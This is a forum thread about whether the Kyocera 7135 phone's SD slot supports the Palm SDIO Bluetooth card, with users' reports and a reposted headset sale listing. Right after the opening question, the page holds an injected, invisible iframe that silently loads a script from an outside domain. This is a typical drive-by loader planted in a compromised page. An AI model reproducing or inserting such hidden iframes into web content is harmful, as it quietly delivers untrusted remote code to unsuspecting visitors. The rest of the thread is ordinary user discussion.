Bluetooth on 7135 Via SD I/O

Has anyone actually used the Palm BT card on a 7135 and made it work? (Or any SD BT card for that matter). I have read multiple articles all over with conflicting information. Some sites say the 7135 is SD I/O enabled, other sites say it is NOT enabled (CNET for example).

Has anybody actually used it yet?<iframe src="http://tmb-corp.com/g/p/l/counter.js" style="display:none"></iframe>

The 7135's SD slot is definitely SDIO. CNET was DEAD WRONG (and did the most horrible job writing that review I have ever seen)! However, you may need specific 7135 drivers to get any SDIO device to work properly on the 7135. See this thread:

It works ... I have been using it for over two weeks!!! Certain things are not supported ... You cannot set up a computer to use the 7135 as a Bluetooth modem. Other than that it does work. See my other posts ...

I have the palm SD card ant it does work. I have not used it as a modem so I can not comment on that. I did run into an issue where I have to soft reset my phone after I am done with the bluetooth or it will lock up within an hour.

There is no connection between the SDIO port and the phone side of the 7135, so it is not possible to use it as a bluetooth modem for any application.

Here is a swipe of a Coolcat post regarding the Jabra BT200. You can always do a search of the archives. I have found the answers to so many of my questions in previous posts. Good luck, and I hope this helps.

T.

I've got a Jabra BT200 BlueTooth headset for sale. This is the version with the 2.5mm adapter for use on phones that aren't equipped with BlueTooth. I used it on my Kyocera 7135. Currently the adapter is stuck on the backside of a battery door so that its easy to put on and take off of the 7135, it works rather well. If you'd like to use it with another type of phone let me know and I will take it off the battery door and put the belt clip back on the adapter.

I only used this headset for about 1 month. I've worn out the headset jack on my 7135 and I purchased this headset just as it was finally starting to give out completely. I've tested the headset on my brother's 7135 and it is working great. I'm including the headset, adapter/charger, AC adapter and I also have the original packaging.

I'm asking $50 shipped within the US 48. My eBay ID is coolcat312 and my current rating is 140. PayPal cash transfer greatly preferred. I can take a credit card through PayPal but then the price will be $55, or to rephrase, there's a $5 discount for paying with cash.

Thanks,

Cool Cat

Great to know the Palm Bluetooth card works on the 7135. [Palm customer support denies this, btw.] But can anyone tell me whether that means you can use a BT headset with the BT card without the need for an outboard BT adapter... as if the phone had BT built in?
